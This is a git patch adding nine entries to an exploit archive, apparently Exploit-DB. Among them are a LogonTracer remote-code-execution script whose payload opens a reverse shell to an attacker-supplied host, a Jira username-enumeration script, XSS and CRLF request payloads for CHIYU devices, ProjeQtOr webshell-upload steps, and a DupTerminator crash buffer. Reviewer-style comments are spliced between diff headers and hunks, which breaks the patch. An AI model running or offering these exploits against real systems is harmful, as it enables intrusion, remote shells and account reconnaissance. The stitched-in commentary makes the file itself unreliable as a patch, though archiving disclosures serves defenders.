From 44903d83c72be488f4bd99104260280b66b58439 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 2 Jun 2021 05:02:06 +0000
Subject: [PATCH] DB: 2021-06-02

9 changes to exploits/shellcodes

DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
Veyon 4.4.1 - 'VeyonService' Unquoted Service Path
LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
ProjeQtOr Project Management 9.1.4 - Remote Code Execution
Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)
WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated)
CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
CHIYU TCP/IP Converter devices - CRLF injection
Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)
---
 exploits/cgi/webapps/49922.txt | 193 +++++++++++++++++++++++++++
 exploits/cgi/webapps/49923.txt | 48 +++++++
 exploits/hardware/webapps/49920.html | 18 +++
 exploits/multiple/webapps/49918.py | 34 +++++
 exploits/multiple/webapps/49924.py | 66 +++++++++
 exploits/php/webapps/49919.txt | 87 ++++++++++++
 exploits/php/webapps/49921.txt | 17 +++
 exploits/windows/dos/49917.py | 27 ++++
 exploits/windows/local/49925.txt | 41 ++++++
 files_exploits.csv | 9 ++
 10 files changed, 540 insertions(+)
 create mode 100644 exploits/cgi/webapps/49922.txt
 create mode 100644 exploits/cgi/webapps/49923.txt
 create mode 100644 exploits/hardware/webapps/49920.html
 create mode 100755 exploits/multiple/webapps/49918.py
 create mode 100755 exploits/multiple/webapps/49924.py
 create mode 100644 exploits/php/webapps/49919.txt
 create mode 100644 exploits/php/webapps/49921.txt
 create mode 100755 exploits/windows/dos/49917.py
 create mode 100644 exploits/windows/local/49925.txt

diff --git a/exploits/cgi/webapps/49922.txt b/exploits/cgi/webapps/49922.txt
new file mode 100644
index 000000000..7d128846c
--- /dev/null
+++ b/exploits/cgi/webapps/49922.txt
@@ -0,0 +1,193 @@
+# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
+# Date: May 31 2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
+# Software Link: https://www.chiyu-tech.com/category-hardware.html
+# Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021
+# Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC
+# CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643
+# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
+
+Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
+
+#1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
+CVE ID: CVE-2021-31250
+CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
+
+============= PoC 01 ===============
+Affected parameter: TF_submask
+Component: if.cgi
+Payload: ">
+
+HTTP Request:
+GET
+/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
+HTTP/1.1
+Host: 192.168.187.12
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.187.12/ap_tcps.htm
+Authorization: Basic OmFkbWlu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Steps to reproduce:
+ 1. Navigate to the vulnerable device
+ 2. Make a GET request to component mentioned (if.cgi)
+ 3. Append the payload at the end of the vulnerable parameter (TF_submask)
+ 4. Submit the request and observe payload execution
+
+ ============= PoC 02 ===============
+Affected parameter: TF_hostname=Component: dhcpc.cgi
+Payload: /">
+HTTP request and response:
+
+HTTP Request:
+GET
+/dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY
+HTTP/1.1
+Host: 192.168.187.12
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.187.12/wan_dc.htm
+Authorization: Basic OmFkbWlu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Steps to reproduce:
+ 1. Navigate to the vulnerable device
+ 2. Make a GET request to component mentioned (dhcpc.cgi)
+ 3. Append the payload at the end of the vulnerable parameter (TF_hostname)
+ 4. Submit the request and observe payload execution
+
+ ============= PoC 03 ===============
+Affected parameter: TF_servicename=Component: ppp.cgi
+Payload: ">
+
+GET
+/ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY
+HTTP/1.1
+Host: 192.168.187.143
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.187.143/wan_pe.htm
+Authorization: Basic OmFkbWlu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Steps to reproduce:
+ 1. Navigate to the vulnerable device
+ 2. Make a GET request to component mentioned (ppp.cgi)
+ 3. Append the payload at the end of the vulnerable parameter
+(TF_servicename)
+ 4. Submit the request and observe payload execution
+
+============= PoC 04 ===============
+Affected parameter: TF_port=Component: man.cgi
+Payload: /">
+
+GET
+/man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY
+HTTP/1.1
+Host: 192.168.187.12
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.187.12/manage.htm
+Authorization: Basic OmFkbWlu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Steps to reproduce:
+ 1. Navigate to the vulnerable device
+ 2. Make a GET request to component mentioned (man.cgi)
+ 3. Append the payload at the end of the vulnerable parameter (TF_port)
+ 4. Submit the request and observe payload execution
+
+
+
+#2: Unauthenticated XSS in several CHIYU IoT devices
+CVE ID: CVE-2021-31641
+Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641
+
+
+Component: any argument passed via URL that results in an HTTP-404
+Payload: http://ip/
+
+
+Steps to reproduce:
+ 1. Navigate to the webpage of the vulnerable device
+ 2. On the web-browsers, you need to append the payload after the IP
+address (see payload above)
+ 3. Submit the request and observe payload execution
+
+
+#3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
+CVE ID: CVE-2021-31643
+Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643
+
+Affected parameter: username=
+Component: if.cgi
+Payload: ">
+
+HTTP request - SEMAC Web Ver7.2
+
+GET
+/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Referer: http://127.0.0.1/EmpRcd.htm
+Cookie: fresh=; remote=00000000
+Upgrade-Insecure-Requests: 1
+
+
+HTTP request - BIOSENSE-III-COMBO(M1)(20000)
+
+GET
+/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Referer: http://127.0.0.1/EmpRcd.htm
+Cookie: fresh=
+Upgrade-Insecure-Requests: 1
+
+
+Steps to reproduce:
+ 1. Navigate to the vulnerable device
+ 2. Make a GET request to component mentioned (if.cgi)
+ 3. Append the payload at the end of the vulnerable parameter (username)
+ 4. Submit the request and observe payload execution
\ No newline at end of file
diff --git a/exploits/cgi/webapps/49923.txt b/exploits/cgi/webapps/49923.txt
new file mode 100644
index 000000000..0746413ce
--- /dev/null
+++ b/exploits/cgi/webapps/49923.txt
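Review bot: Every request in the #1 and #3 PoCs carries an `Authorization: Basic` header and both of their CVSS vectors say PR:L, yet neither the `# Exploit Title` line nor the files_exploits.csv description marks the entry as authenticated the way 49921 does; the title should read `CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)` or the header should state that only #2 (CVE-2021-31641, PR:N) is reachable without credentials. The file has no mitigation line while the sibling advisory 49923 ends with one; adding `Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.` would keep the two consistent and give administrators something actionable. The `Affected parameter:` lines of PoC 02–04 run straight into `Component:` (`TF_hostname=Component: dhcpc.cgi`), which looks like a lost line break and should be split as in PoC 01.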
@@ -0,0 +1,48 @@
+# Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection
+# Date: May 31 2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
+# Software Link: https://www.chiyu-tech.com/category-hardware.html
+# Version: BF-430, BF-431, and BF-450M TCP/IP Converter devices - all firmware versions < June 2021
+# Tested on: BF-430, BF-431, and BF-450M
+# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
+
+Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.
+CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
+
+Affected parameter: redirect=Component: all the CGI components
+Payload: %0d%0a%0d%0a
+
+====HTTP request======
+GET
+/man.cgi?redirect=setting.htm%0d%0a%0d%0a&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY
+HTTP/1.1
+Host: 192.168.187.12
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.187.12/manage.htm
+Authorization: Basic OmFkbWlu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+======HTTP response========
+HTTP/1.1 302 Found
+Location: setting.htm
+
+Content-Length: 0
+Content-Type: text/html
+
+
+Steps to reproduce:
+ 1. Navigate to the vulnerable device
+ 2. Make a GET request to all CGI components
+ 3. Append the payload at the end of the vulnerable parameter (redirect )
+ 4. Submit the request and observe payload execution
+
+
+ Mitigation: The latest version of the CHIYU firmware should be installed
+to mitigate this vulnerability.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49920.html b/exploits/hardware/webapps/49920.html
new file mode 100644
index 000000000..d3648068e
--- /dev/null
+++ b/exploits/hardware/webapps/49920.html
@@ -0,0 +1,18 @@
+# Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)
+# Date: 2021-05-30
+# Exploit Author: lated
+# Vendor Homepage: https://www.ubeeinteractive.com
+# Version: EVW327
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49918.py b/exploits/multiple/webapps/49918.py
new file mode 100755
index 000000000..01d325be7
--- /dev/null
+++ b/exploits/multiple/webapps/49918.py
@@ -0,0 +1,34 @@
+# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
+# Date: 29/05/2021
+# Exploit Author: g0ldm45k
+# Vendor Homepage: https://www.jpcert.or.jp/
+# Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0
+# Version: 1.2.0 and earlier
+# Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)
+# CVE : CVE-2018-16167
+
+import requests
+import argparse
+
+parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')
+parser.add_argument('aip', type=str, help='Attacker ip')
+parser.add_argument('aport', type=str, help='Attacker port')
+parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')
+
+args = parser.parse_args()
+
+ATTACKER_IP = args.aip
+ATTACKER_PORT = args.aport
+PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"
+
+VICTIM_URL = args.victimurl
+VICTIM_ENDPOINT = "/upload"
+
+DATA = {
+ "logtype": "XML",
+ "timezone": f"1;{PAYLOAD};",
+}
+
+print("[!] Sending request... If your terminal hangs, you might have a shell!")
+requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA)
+print("[*] Done. Did you get what you wanted?")
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49924.py b/exploits/multiple/webapps/49924.py
new file mode 100755
index 000000000..1d7130b11
--- /dev/null
+++ b/exploits/multiple/webapps/49924.py
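Review bot: The header block has no `# CVE:` line even though the reference URL ends in `#cve-2021-31249`, so the entry cannot be found by CVE in the index; if that is the assigned identifier, add `# CVE: CVE-2021-31249` after `# Tested on:`. The same omission applies to 49921.txt, whose `# Proof:` link ends in `cve-2021-24313/`. The response excerpt (`Location: setting.htm` followed by an empty line before `Content-Length`) is the actual evidence that the injected CRLF pair terminated the header block, and the description should say so explicitly, since that header/body split is what an operator reviewing logs or writing a filter rule needs to recognise. The `Affected parameter: redirect=Component: all the CGI components` line also looks like a lost line break and should be two lines.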
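Review bot: 49918.py is committed with mode 100755 but its first line is `# Exploit Title:` rather than a shebang, so executing it directly fails, and its f-strings require Python 3.6+; put `#!/usr/bin/env python3` on line 1. The `# CVE : CVE-2018-16167` header has a stray space before the colon that breaks the `# Key: value` pattern the other headers follow. For defenders the file never states what the vulnerable sink is; a comment above `DATA` such as `# CVE-2018-16167: the "timezone" field of POST /upload is passed to a shell unescaped, so shell metacharacters in that field are the detection signal` would make the advisory usable for log review and filter rules. The argument help strings also describe `aip`/`aport` only as "Attacker ip/port"; saying they are the listener the spawned shell connects back to would document why the script blocks, as the `[!]` message hints.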
@@ -0,0 +1,66 @@
+# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)
+# Date: 31/05/2021
+# Exploit Author: Mohammed Aloraimi
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/jira
+# Vulnerable versions: version 8.11.x to 8.15.0
+# Tested on: Kali Linux
+# Proof Of Concept:
+
+'''
+A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x. Unauthenticated users can ENUMRATE valid users via /secure/QueryComponent!Jql.jspa endpoint.
+
+Tested versions:
+
+Atlassian JIRA 8.11.1
+Atlassian JIRA 8.13
+Atlassian JIRA 8.15
+'''
+
+#!/usr/bin/env python
+
+__author__ = "Mohammed Aloraimi (@ixSly)"
+
+
+
+import requests
+import sys
+import re
+import urllib3
+urllib3.disable_warnings()
+
+
+def help():
+ print('python script.py ')
+ print('e.g. python script.py https://jiratarget.com admin')
+ sys.exit()
+
+if len(sys.argv) < 3:
+ help()
+
+
+
+def pwn(url,username):
+
+ try:
+ headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"}
+ data="jql=creator+in+({})&decorator=none".format(username)
+ req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data)
+ if "issue.field.project" in req.text and req.status_code == 200:
+ print("[+] {} is a Valid User".format(username))
+ userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip())
+ if userFullName:
+ print("[+] User FullName: " + userFullName.group(1))
+ elif '["jqlTooComplex"]' in req.text and req.status_code == 401:
+ print("[-] {} is not a Valid User".format(username))
+ else:
+ print("[-] Error..")
+ except Exception as e:
+ print(str(e))
+ pass
+
+server = sys.argv[1]
+username = sys.argv[2]
+
+
+pwn(server,username)
\ No newline at end of file
diff --git a/exploits/php/webapps/49919.txt b/exploits/php/webapps/49919.txt
new file mode 100644
index 000000000..b012963aa
--- /dev/null
+++ b/exploits/php/webapps/49919.txt
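Review bot: The `#!/usr/bin/env python` line sits after the module docstring (around line 20 of the file), where the interpreter never sees it, even though the file is added with mode 100755; move it to line 1 or drop it. The header says `Vulnerable versions: version 8.11.x to 8.15.0` while the docstring says `8.11.x to 8.15.x` and misspells "enumerate" as ENUMRATE; the two ranges should agree. In `pwn`, `def help()` shadows the builtin, `verify=False` together with `urllib3.disable_warnings()` silently accepts any TLS certificate, and `except Exception as e: print(str(e)); pass` has a dead `pass`; `except (requests.RequestException, KeyError, ValueError) as e:` would cover what the body can actually raise (`req.json()["values"]["creator"]` is the KeyError/ValueError source) without hiding everything else. For defenders the useful fact buried in the `if`/`elif` is that an unauthenticated POST to `/secure/QueryComponent!Jql.jspa` answers 200 with `issue.field.project` for an existing user and 401 with `jqlTooComplex` otherwise; a one-line comment above the `if` stating that would document why those two strings are compared and what to alert on.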
@@ -0,0 +1,87 @@
+# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution
+# Date: 29.05.2021
+# Exploit Author: Temel Demir
+# Vendor Homepage: https://www.projeqtor.org
+# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip
+# Version: v9.1.4
+# Tested on: Laragon @WIN10
+# Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section.
+
+PoC Process Step_by_Step:
+
+# 1) Create a file with the below php code and save it as demir.pHp
+
+&1'); ?>
+
+# 2) Login to ProjeQtOr portal as guest user
+# 3) Click -profile- button on header panel.
+# 4) Click -add photo- button and chose upload section and browse your demir.pHp file.
+# 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" )
+# 6) As a last step you have to add the ".projeqtor" statement to the file extension.
+You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor
+
+# 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command]
+
+
+
+Example Request:
+
+POST /project/tool/saveAttachment.php HTTP/1.1
+Host: ip:port
+Content-Length: 1196
+Accept: application/json
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Origin: http://ip:port/website_location/
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://ip:port/website_location/view/main.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit)
+Connection: close
+
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp"
+Content-Type: application/octet-stream
+
+&1'); ?>
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentId"
+
+
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentRefType"
+
+User
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentRefId"
+
+($your_profile_id //edit)
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentType"
+
+file
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+10485760
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentLink"
+
+
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentDescription"
+
+
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentPrivacy"
+
+1
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="uploadType"
+
+html5
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ--
\ No newline at end of file
diff --git a/exploits/php/webapps/49921.txt b/exploits/php/webapps/49921.txt
new file mode 100644
index 000000000..370551da7
--- /dev/null
+++ b/exploits/php/webapps/49921.txt
@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2021-05-31
+# Exploit Author: Bastijn Ouwendijk
+# Vendor Homepage: http://goprayer.com/
+# Software Link: https://wordpress.org/plugins/wp-prayer/
+# Version: 1.6.1 and earlier
+# Tested on: Windows 10
+# Proof: https://bastijnouwendijk.com/cve-2021-24313/
+
+Steps to exploit this vulnerability:
+
+1. Log into the WordPress website with a user account, can be a user with any role
+2. Go to the page where prayer or praise request can be made and fill in the requested information
+3. In the 'prayer_messages' field of the prayer request form put the payload:
+4. Submit the form
+5. Go to the page where the prayer requests are listed
+6. The prayer requests are loaded and an alert is shown with text 'XSS' in the browser
\ No newline at end of file
diff --git a/exploits/windows/dos/49917.py b/exploits/windows/dos/49917.py
new file mode 100755
index 000000000..d7111f8b8
--- /dev/null
+++ b/exploits/windows/dos/49917.py
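Review bot: The example paths in 49919.txt disagree: step 5 says the upload lands in `/files/attach//attachment_23/` (double slash, attachment 23) while steps 6 and 7 use `/files/attach/attachment_1/`; pick one attachment number and a single slash so a reader can map the `Attachment #($number) inserted` message to the resulting URL. The `# Description :` line claims an `authorization upgrade with guest user`, but none of the seven steps shows a privilege change inside the application, only code execution in the web server's context; either add the step that demonstrates it or drop the claim. A mitigation line is missing: the steps show that `/files/attach/` is served from the document root and that a `.pHp.projeqtor` file placed there is executed, so noting that attachments should be stored outside the web root, or served from a location with script execution disabled, would give administrators an interim control until they upgrade. The `# Tested on: Laragon @WIN10` header also leaves open whether the behaviour was confirmed on a Linux/Apache deployment, which is worth stating since handler mapping for multi-dot file names differs between stacks.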
@@ -0,0 +1,27 @@
+# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
+# Date: 2021-05-28
+# Author: Brian Rodríguez
+# Software Site: https://sourceforge.net/projects/dupterminator/
+# Version: 1.4.5639.37199
+# Category: DoS (Windows)
+
+##### Vulnerability #####
+
+DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box.
+
+Successful exploitation will causes application stop working.
+
+I have been able to test this exploit against Windows 10.
+
+##### PoC #####
+
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/windows/local/49925.txt b/exploits/windows/local/49925.txt
new file mode 100644
index 000000000..2b5a90bff
--- /dev/null
+++ b/exploits/windows/local/49925.txt
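Review bot: The prose on lines 10, 12 and 14 of 49917.py (`DupTerminator is vulnerable ...`, `Successful exploitation ...`, `I have been able ...`) is not commented, so this `.py` file, committed as 100755, raises a SyntaxError on the first of them before any code runs, and the `#!/usr/bin/env python` on line 18 is inert there; prefix those lines with `#` or move the code block to the top with the shebang on line 1. The file handling should be `with open("payload.txt", "w") as f: f.write(buffer)` so the handle is released even when the write fails, and the bare `except:` narrowed to `except OSError:` so a KeyboardInterrupt is not reported as `File cannot be created`. The row added to files_exploits.csv spells the author `Brian Rodriguez` while the file header says `Brian Rodríguez`; one of the two should be corrected. The vulnerability text never says what the 8000-byte input does to the process (crash, hang, unhandled exception dialog), which is the one detail a triager needs to rate this beyond a generic DoS.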
@@ -0,0 +1,41 @@
+# Exploit Title: Veyon 4.4.1 - 'VeyonService' Unquoted Service Path
+# Discovery by: Víctor García
+# Discovery Date: 2020-03-23
+# Vendor Homepage: https://veyon.io/
+# Software Link: https://github.com/veyon/veyon/releases/download/v4.4.1/veyon-4.4.1.0-win64-setup.exe
+# Tested Version: 4.4.1
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Pro x64
+# CVE: CVE-2020-15261
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i
+"auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
+Veyon Service VeyonService C:\Program Files\Veyon\veyon-service.exe
+
+
+# Service info:
+
+C:\>sc qc VeyonService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VeyonService
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Veyon\veyon-service.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Veyon Service
+ DEPENDENCIES : Tcpip
+ : RpcSs
+ SERVICE_START_NAME : LocalSystem
+
+
+# Exploit:
+
+# A successful attempt would require the local user to be able to insert their code in the
+# system root path undetected by the OS or other security applications where it could
+# potentially be executed during application startup or reboot. If successful, the local
+# user's code would execute with the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6e88233c8..cc2566b0d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
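Review bot: The `# Exploit:` section is generic boilerplate and never states the precondition that makes this particular path exploitable: with `BINARY_PATH_NAME : C:\Program Files\Veyon\veyon-service.exe` the unquoted-path lookup only matters if a non-administrator can create files directly under `C:\` or `C:\Program Files\`, which default Windows ACLs do not permit, so the advisory should say that impact depends on those directory permissions being loosened (the `SERVICE_START_NAME : LocalSystem` line is what justifies the "elevated privileges" claim and deserves a pointer). A fix or mitigation line is missing: CVE-2020-15261 implies a vendor fix exists, so the header should cite the first fixed release if known, and for administrators the interim control is to quote the service's binary path (for example via `sc config VeyonService binPath= ...`) and to audit the ACLs on the two directories above. The `# Discovery Date: 2020-03-23` value is more than a year before the `2021-06-01` date in the index row; if that is intentional a `# Date:` line with the publication date would keep the header consistent with the other advisories in this commit.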
@@ -6784,6 +6784,7 @@ id,file,description,date,author,type,platform,port
